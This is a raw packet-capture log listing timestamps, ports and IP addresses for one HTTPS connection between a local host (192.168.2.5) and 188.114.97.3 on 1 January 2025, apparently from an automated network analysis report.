Jan 1, 2025 16:54:12.661570072 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.663983107 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.663999081 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.664060116 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.664067030 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.664104939 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.664242029 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.664256096 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.664283991 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.664289951 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.664318085 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.664324999 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.664484978 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.664505005 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.664550066 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.664557934 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.664589882 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.664871931 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.717459917 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.717480898 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.717535973 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.717546940 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.717576981 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.717592955 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.768865108 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.768887997 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.768925905 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.768937111 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.768960953 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.768978119 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.775753975 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.775769949 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.775839090 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.775846958 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.775887966 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.776900053 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.776916027 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.776953936 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.776961088 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.776985884 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.777009964 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.781471014 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.781488895 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.781550884 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.781559944 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.781604052 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.795497894 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.795519114 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.795584917 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.795591116 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.795638084 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.795644999 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.796408892 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.796428919 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.796456099 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.796463013 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.796492100 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.796503067 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.796538115 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.796554089 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.796581984 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.796587944 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.796614885 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.796633959 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.865802050 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.865818024 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.865910053 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.865920067 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.865967989 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.873320103 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.873337030 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.873399019 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.873405933 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.873457909 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.873563051 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.873577118 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.873625040 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.873631954 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.873675108 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.874001980 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.874021053 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.874063015 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.874069929 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.874100924 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.874121904 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.874171972 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.874187946 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.874238014 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.874245882 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.874289989 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.884287119 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.884305954 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.884360075 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.884366035 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.884393930 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.884414911 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.884884119 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.884907961 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.884958029 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.884965897 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.885005951 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.885345936 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.885361910 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.885442972 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.885451078 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.885490894 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.954499960 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.954523087 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.954638958 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.954651117 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.954704046 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.961929083 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.961947918 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962014914 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.962022066 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962060928 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.962301970 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962316990 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962352037 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.962357998 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962383986 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.962397099 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.962517977 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962532043 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962579012 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.962585926 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962625980 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.962750912 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962765932 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962800026 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.962805986 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.962835073 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.962852001 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.972744942 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.972764969 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.972825050 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.972832918 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.972875118 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.973556995 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.973572969 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.973624945 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.973633051 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.973669052 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.973920107 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.973934889 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.973978043 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:12.973984957 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:12.974021912 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.043174028 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.043195963 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.043289900 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.043297052 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.043340921 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.050556898 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.050575972 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.050676107 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.050683975 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.050729036 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.050977945 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.050996065 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.051037073 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.051044941 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.051086903 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.051420927 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.051436901 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.051466942 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.051475048 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.051503897 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.051522017 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.051713943 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.051729918 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.051769972 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.051776886 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.051812887 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.054742098 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.061456919 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.061496973 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.061583042 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.061589956 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.061630011 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.062145948 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.062160969 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.062211990 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.062218904 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.062258959 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.062674999 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.062690020 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.062728882 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.062736034 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.062771082 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.131730080 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.131752968 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.131839037 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.131848097 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.131896973 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.139245033 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.139261007 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.139329910 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.139336109 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.139377117 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.139585018 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.139600992 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.139636040 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.139642954 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.139672041 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.139686108 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.139986038 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.140002966 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.140048027 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.140053988 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.140072107 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.140095949 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.140140057 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.140155077 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.140207052 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.140213966 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.140230894 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.140254021 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.150049925 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.150068045 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.150126934 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.150135040 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.150152922 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.150187016 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.150742054 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.150759935 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.150813103 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.150820017 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.150861025 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.151293993 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.151323080 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.151356936 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.151364088 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.151393890 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.151410103 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240104914 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240128040 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240221024 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240230083 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240272999 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240278959 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240292072 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240312099 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240334034 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240339994 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240359068 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240386963 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240425110 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240438938 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240490913 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240498066 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240541935 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240629911 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240644932 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240694046 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240704060 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240744114 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240809917 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240832090 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240874052 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240880013 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240925074 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.240948915 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.240966082 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.241014957 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.241022110 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.241059065 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.241126060 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.241143942 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.241178036 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.241183996 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.241205931 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.241221905 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.241343975 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.241358995 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.241393089 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.241398096 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.241419077 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.241441965 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.244415045 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.322979927 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.322998047 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.323036909 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.323048115 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.323069096 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.323084116 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.323242903 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.323259115 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.323308945 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.323321104 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.323359013 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.328288078 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.328301907 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.328344107 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.328351021 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.328366995 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.328445911 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.328516960 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.328535080 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.328569889 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.328577042 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.328600883 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.328617096 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.328896046 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.328910112 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.328943014 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.328948975 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.328972101 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.329010963 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.329104900 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.329118967 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.329161882 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.329169035 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.329183102 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.329214096 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.329341888 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.329355955 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.329396009 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.329401970 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.329432011 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.329440117 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.329504013 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.329519987 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.329552889 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.329567909 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.329582930 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.329607964 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.332873106 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.411669016 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.411686897 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.411747932 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.411756992 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.411798954 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.411896944 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.411938906 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.411947966 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.411953926 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.411983967 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.411997080 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.416883945 CET	443	49983	188.114.97.3	192.168.2.5
